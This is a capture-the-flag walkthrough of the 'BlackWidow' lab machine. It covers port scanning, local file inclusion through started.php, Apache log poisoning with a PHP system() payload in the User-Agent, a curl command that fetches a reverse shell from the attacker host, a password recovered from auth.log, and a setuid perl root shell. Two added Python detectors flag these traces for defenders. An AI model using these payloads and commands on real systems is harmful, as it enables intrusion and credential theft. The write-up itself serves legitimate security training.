The target machine's IP is 192.168.56.129.

Port scanning

sudo nmap --min-rate 10000 -p- 192.168.56.129
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-02-25 04:10 UTC
Nmap scan report for 192.168.56.129
Host is up (0.00043s latency).
Not shown: 65526 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
111/tcp open rpcbind
2049/tcp open nfs
3128/tcp open squid-http
36483/tcp open unknown
45041/tcp open unknown
51739/tcp open unknown
52757/tcp open unknown
MAC Address: 08:00:27:77:E1:75 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 2.57 seconds
sudo nmap -sT -sV -sC -O -p22,80,111,2049,3128,36483,45041,51739,52757 192.168.56.129    
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-02-25 04:11 UTC
Nmap scan report for 192.168.56.129
Host is up (0.00027s latency).

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 f8:3b:7c:ca:c2:f6:5a:a6:0e:3f:f9:cf:1b:a9:dd:1e (RSA)
| 256 04:31:5a:34:d4:9b:14:71:a0:0f:22:78:2d:f3:b6:f6 (ECDSA)
|_ 256 4e:42:8e:69:b7:90:e8:27:68:df:68:8a:83:a7:87:9c (ED25519)
80/tcp open http Apache httpd 2.4.38 ((Debian))
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.4.38 (Debian)
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 3,4 111/tcp6 rpcbind
| 100000 3,4 111/udp6 rpcbind
| 100003 3 2049/udp nfs
| 100003 3 2049/udp6 nfs
| 100003 3,4 2049/tcp nfs
| 100003 3,4 2049/tcp6 nfs
| 100005 1,2,3 49091/udp6 mountd
| 100005 1,2,3 50150/udp mountd
| 100005 1,2,3 51563/tcp6 mountd
| 100005 1,2,3 51739/tcp mountd
| 100021 1,3,4 36483/tcp nlockmgr
| 100021 1,3,4 43921/tcp6 nlockmgr
| 100021 1,3,4 54610/udp nlockmgr
| 100021 1,3,4 55575/udp6 nlockmgr
| 100227 3 2049/tcp nfs_acl
| 100227 3 2049/tcp6 nfs_acl
| 100227 3 2049/udp nfs_acl
|_ 100227 3 2049/udp6 nfs_acl
2049/tcp open nfs 3-4 (RPC #100003)
3128/tcp open http-proxy Squid http proxy 4.6
|_http-server-header: squid/4.6
|_http-title: ERROR: The requested URL could not be retrieved
36483/tcp open nlockmgr 1-4 (RPC #100021)
45041/tcp open mountd 1-3 (RPC #100005)
51739/tcp open mountd 1-3 (RPC #100005)
52757/tcp open mountd 1-3 (RPC #100005)
MAC Address: 08:00:27:77:E1:75 (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 13.10 seconds
sudo nmap --script=vuln -p22,80,111,2049,3128,36483,45041,51739,52757 192.168.56.129      
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-02-25 04:13 UTC
Pre-scan script results:
| broadcast-avahi-dos:
| Discovered hosts:
| 224.0.0.251
| After NULL UDP avahi packet DoS (CVE-2011-1002).
|_ Hosts are all up (not vulnerable).
Nmap scan report for 192.168.56.129
Host is up (0.00018s latency).

PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
| http-enum:
| /company/: Potentially interesting folder
| /docs/: Potentially interesting directory w/ listing on 'apache/2.4.38 (debian)'
|_ /js/: Potentially interesting directory w/ listing on 'apache/2.4.38 (debian)'
111/tcp open rpcbind
2049/tcp open nfs
3128/tcp open squid-http
36483/tcp open unknown
45041/tcp open unknown
51739/tcp open unknown
52757/tcp open unknown
MAC Address: 08:00:27:77:E1:75 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 55.01 seconds

Getshell

Browsing to port 80, the directory scan shows a /company directory, but it will not load; it evidently needs name resolution. Right-click to view the page source, then add blackwidow to the hosts file.

The company root is just a portal site, so scan its directories.

gobuster dir -u http://blackwidow/company/ -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -x rar,zip,sql,txt,php,html,bak
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://blackwidow/company/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Extensions: zip,sql,txt,php,html,bak,rar
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.php (Status: 403) [Size: 275]
/index.html (Status: 200) [Size: 42271]
/.html (Status: 403) [Size: 275]
/assets (Status: 301) [Size: 317] [--> http://blackwidow/company/assets/]
/forms (Status: 301) [Size: 316] [--> http://blackwidow/company/forms/]
/changelog.txt (Status: 200) [Size: 1175]
/Readme.txt (Status: 200) [Size: 222]
/.html (Status: 403) [Size: 275]
/.php (Status: 403) [Size: 275]
/started.php (Status: 200) [Size: 42271]
Progress: 1764480 / 1764488 (100.00%)
===============================================================
Finished
===============================================================

The page source also contains this line:

We are working to develop a php inclusion method using "file" parameter - Black Widow DevOps Team.

So some page probably has a file inclusion.

Try started.php:

curl -v "http://blackwidow/company/started.php?file=../../../../../../../../../../../../../../etc/passwd"


* Host blackwidow:80 was resolved.
* IPv6: (none)
* IPv4: 192.168.56.129
* Trying 192.168.56.129:80...
* Connected to blackwidow (192.168.56.129) port 80

> GET /company/started.php?file=../../../../../../../../../../../../../../etc/passwd HTTP/1.1
> Host: blackwidow
> User-Agent: curl/8.5.0
> Accept: */*
>
< HTTP/1.1 200 OK
< Date: Sun, 25 Feb 2024 04:33:47 GMT
< Server: Apache/2.4.38 (Debian)
< Vary: Accept-Encoding
< Content-Length: 1582
< Content-Type: text/html; charset=UTF-8
<
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
systemd-timesync:x:101:102:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
systemd-network:x:102:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:103:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:104:110::/nonexistent:/usr/sbin/nologin
avahi-autoipd:x:105:112:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/usr/sbin/nologin
sshd:x:106:65534::/run/sshd:/usr/sbin/nologin
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
viper:x:1001:1001:Viper,,,:/home/viper:/bin/bash
_rpc:x:107:65534::/run/rpcbind:/usr/sbin/nologin
statd:x:108:65534::/var/lib/nfs:/usr/sbin/nologin

* Connection #0 to host blackwidow left intact

The file inclusion is confirmed!

With the Apache log readable through it, this is essentially a log poisoning case.

curl -v "http://blackwidow/company/started.php?file=../../../../../../../../../../../../../../var/log/apache2/access.log" 
* Host blackwidow:80 was resolved.
* IPv6: (none)
* IPv4: 192.168.56.129
* Trying 192.168.56.129:80...
* Connected to blackwidow (192.168.56.129) port 80

> GET /company/started.php?file=../../../../../../../../../../../../../../var/log/apache2/access.log HTTP/1.1
> Host: blackwidow
> User-Agent: curl/8.5.0
> Accept: */*
>
< HTTP/1.1 200 OK
< Date: Sun, 25 Feb 2024 04:41:52 GMT
< Server: Apache/2.4.38 (Debian)
< Vary: Accept-Encoding
< Content-Length: 426
< Content-Type: text/html; charset=UTF-8
<
192.168.56.102 - - [24/Feb/2024:23:40:48 -0500] "GET /company/started.php?file=../../../../../../../../../../../../../../var/log/apache2/access.log HTTP/1.1" 200 147 "-" "curl/8.5.0"
192.168.56.102 - - [24/Feb/2024:23:41:05 -0500] "GET /company/started.php?file=../../../../../../../../../../../../../../var/log/apache2/access.log HTTP/1.1" 200 404 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0"

* Connection #0 to host blackwidow left intact

The log can indeed be read, so a PHP tag planted in the User-Agent will be executed when the log is included:

curl -v "http://blackwidow/" -A "<?php system(\$_GET['shell']); ?>"
curl -v "http://blackwidow/company/started.php?file=../../../../../../../../../../../../../../var/log/apache2/access.log&shell=whoami" 
* Host blackwidow:80 was resolved.
* IPv6: (none)
* IPv4: 192.168.56.129
* Trying 192.168.56.129:80...
* Connected to blackwidow (192.168.56.129) port 80

> GET /company/started.php?file=../../../../../../../../../../../../../../var/log/apache2/access.log&shell=whoami HTTP/1.1
> Host: blackwidow
> User-Agent: curl/8.5.0
> Accept: */*
>
< HTTP/1.1 200 OK
< Date: Sun, 25 Feb 2024 04:44:01 GMT
< Server: Apache/2.4.38 (Debian)
< Vary: Accept-Encoding
< Content-Length: 698
< Content-Type: text/html; charset=UTF-8
<
192.168.56.102 - - [24/Feb/2024:23:40:48 -0500] "GET /company/started.php?file=../../../../../../../../../../../../../../var/log/apache2/access.log HTTP/1.1" 200 147 "-" "curl/8.5.0"
192.168.56.102 - - [24/Feb/2024:23:41:05 -0500] "GET /company/started.php?file=../../../../../../../../../../../../../../var/log/apache2/access.log HTTP/1.1" 200 404 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0"
192.168.56.102 - - [24/Feb/2024:23:41:52 -0500] "GET /company/started.php?file=../../../../../../../../../../../../../../var/log/apache2/access.log HTTP/1.1" 200 598 "-" "curl/8.5.0"
192.168.56.102 - - [24/Feb/2024:23:43:32 -0500] "GET / HTTP/1.1" 200 334 "-" "www-data
"

* Connection #0 to host blackwidow left intact

Command execution works: the injected tag ran whoami and the log now shows www-data where the User-Agent used to be.

Privilege escalation

Upload a reverse shell from the attacking machine through the same mechanism, then trigger it by requesting it.
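As an added, defender-side example that is not part of the original writeup: a small Python scanner that reads Apache combined-format access log lines and flags the three traces this chain leaves behind, traversal sequences in the request, a log path handed to an include parameter, and a PHP open tag in the User-Agent or Referer. The sample lines are constructed in the same format as the entries above (values made up here), and the regexes are this example's own heuristics, not part of Apache or the target.

```python
import re
from urllib.parse import unquote

# Constructed sample lines in Apache combined log format, modelled on the
# access.log entries quoted in this writeup (values are made up here).
SAMPLE_ACCESS_LOG = """\
192.168.56.102 - - [24/Feb/2024:23:40:10 -0500] "GET /company/index.html HTTP/1.1" 200 42271 "-" "Mozilla/5.0"
192.168.56.102 - - [24/Feb/2024:23:40:48 -0500] "GET /company/started.php?file=../../../../etc/passwd HTTP/1.1" 200 1582 "-" "curl/8.5.0"
192.168.56.102 - - [24/Feb/2024:23:43:32 -0500] "GET / HTTP/1.1" 200 334 "-" "<?php system($_GET['shell']); ?>"
192.168.56.102 - - [24/Feb/2024:23:44:01 -0500] "GET /company/started.php?file=..%2F..%2F..%2Fvar/log/apache2/access.log&shell=whoami HTTP/1.1" 200 698 "-" "curl/8.5.0"
"""

# Combined log format: ip ident user [ts] "method target proto" status size "referer" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+)[^"]*" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)
TRAVERSAL_RE = re.compile(r'\.\.[/\\]')                      # ../ or ..\ after decoding
LOG_PATH_RE = re.compile(r'/var/log/|/proc/self/|\.log\b')   # log or proc file as include source
PHP_TAG_RE = re.compile(r'<\?(php|=)', re.IGNORECASE)        # PHP open tag planted in a header

def classify(entry):
    """Return the indicators found in one parsed entry (empty list if benign)."""
    target = unquote(unquote(entry["target"]))  # decode twice to catch double encoding
    reasons = []
    if TRAVERSAL_RE.search(target):
        reasons.append("traversal")
    if LOG_PATH_RE.search(target):
        reasons.append("log_include")
    if any(PHP_TAG_RE.search(field) for field in (entry["ua"], entry["referer"], target)):
        reasons.append("php_tag")
    return reasons

def scan_access_log(text):
    """Parse each line and report those carrying LFI or log-poisoning indicators."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        m = LOG_RE.match(line)
        if not m:
            findings.append({"line": lineno, "reasons": ["unparsable"]})
            continue
        entry = m.groupdict()
        reasons = classify(entry)
        if reasons:
            findings.append({"line": lineno, "ip": entry["ip"], "ts": entry["ts"],
                             "target": entry["target"], "reasons": reasons})
    return findings
```

A single hit on php_tag followed by log_include from the same address is the exact sequence seen above and deserves an alert on its own; the "unparsable" bucket is worth keeping because a poisoned line may also break the log format.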

curl -v "http://blackwidow/company/started.php?file=../../../../../../../../../../../../../../var/log/apache2/access.log&shell=curl%20http://192.168.56.102/reverseshell.php%20-o%20shell.php%20&&%20chmod%20+x%20shell.php%0A%0A"

There is also a viper user, so look for sensitive files under /var/.

/var/backups/auth.log turns out to be readable.

It contains this section:

Dec 12 16:56:24 test sshd[29558]: Failed password for viper from 192.168.1.109 port 7088 ssh2
Dec 12 16:56:29 test sshd[29558]: Failed password for viper from 192.168.1.109 port 7088 ssh2
Dec 12 16:56:32 test sshd[29558]: Failed password for viper from 192.168.1.109 port 7088 ssh2
Dec 12 16:56:34 test sshd[29558]: error: Received disconnect from 192.168.1.109 port 7088:13: Unable to authenticate [preauth]
Dec 12 16:56:34 test sshd[29558]: Disconnected from authenticating user viper 192.168.1.109 port 7088 [preauth]
Dec 12 16:56:34 test sshd[29558]: PAM 2 more authentication failures; logname= uid=0 euid=0 tty=ssh ruser= rhost=192.168.1.109 user=viper
Dec 12 16:56:43 test sshd[29560]: Invalid user ?V1p3r2020!? from 192.168.1.109 port 7090

?V1p3r2020!? should be viper's password, typed into the username field by mistake and recorded by sshd as an invalid user.

Connect over ssh.

In the home directory, .bash_history has content.

Change into ~/backup_site/assets/vendor/weapon; there is a binary called arsenic, which is really just a perl binary.
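An added example that is not from the original writeup: a Python check for the auth.log mistake exploited above, where a password typed into the username field is recorded verbatim in an "Invalid user" entry. It flags such entries, correlates them with earlier failed logins from the same source address to name the account probably affected, and masks the value in its report. The excerpt is constructed in the same format as the one above with made-up values, and the username pattern is an assumption to adjust to local naming rules.

```python
import re

# Constructed auth.log excerpt in the format of the one quoted above;
# host, PIDs, addresses and the odd "username" are all made up here.
SAMPLE_AUTH_LOG = """\
Dec 12 16:56:24 test sshd[29558]: Failed password for alice from 192.168.1.109 port 7088 ssh2
Dec 12 16:56:29 test sshd[29558]: Failed password for alice from 192.168.1.109 port 7088 ssh2
Dec 12 16:56:34 test sshd[29558]: Disconnected from authenticating user alice 192.168.1.109 port 7088 [preauth]
Dec 12 16:56:43 test sshd[29560]: Invalid user Tr0ub4dor&3! from 192.168.1.109 port 7090
Dec 12 17:02:11 test sshd[29571]: Invalid user admin from 10.0.0.5 port 41000
"""

FAILED_RE = re.compile(r'sshd\[\d+\]: Failed password for (?:invalid user )?(?P<user>\S+) from (?P<ip>\S+)')
INVALID_RE = re.compile(r'sshd\[\d+\]: Invalid user (?P<user>.+?) from (?P<ip>\S+) port \d+')
# Assumption: local accounts use POSIX portable username characters only.
VALID_USERNAME_RE = re.compile(r'^[a-z_][a-z0-9_-]{0,31}\$?$')

def mask(value):
    """Keep only the first character so the report does not itself leak a secret."""
    return value[0] + "*" * (len(value) - 1) if value else ""

def find_credential_leaks(text):
    """Flag 'Invalid user' entries whose 'username' does not look like a username,
    and list the accounts that failed to log in earlier from the same address."""
    failed_users_by_ip = {}
    findings = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        m = FAILED_RE.search(line)
        if m:
            failed_users_by_ip.setdefault(m["ip"], set()).add(m["user"])
            continue
        m = INVALID_RE.search(line)
        if m and not VALID_USERNAME_RE.match(m["user"]):
            findings.append({
                "line": lineno,
                "ip": m["ip"],
                "masked": mask(m["user"]),
                "likely_account_for": sorted(failed_users_by_ip.get(m["ip"], ())),
            })
    return findings
```

A hit with a non-empty likely_account_for is a strong signal that the listed account's password is sitting in the log in clear text and should be rotated, and that the log file itself (including any copy under /var/backups) needs restrictive permissions.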

./arsenic -e 'use POSIX qw(setuid); POSIX::setuid(0); exec "/bin/sh";'

Now we are root!

Ramblings

A fairly easy room overall; everything in it was stuff I had already learned.

Machine number 100! I will be taking a break from machines for a while :(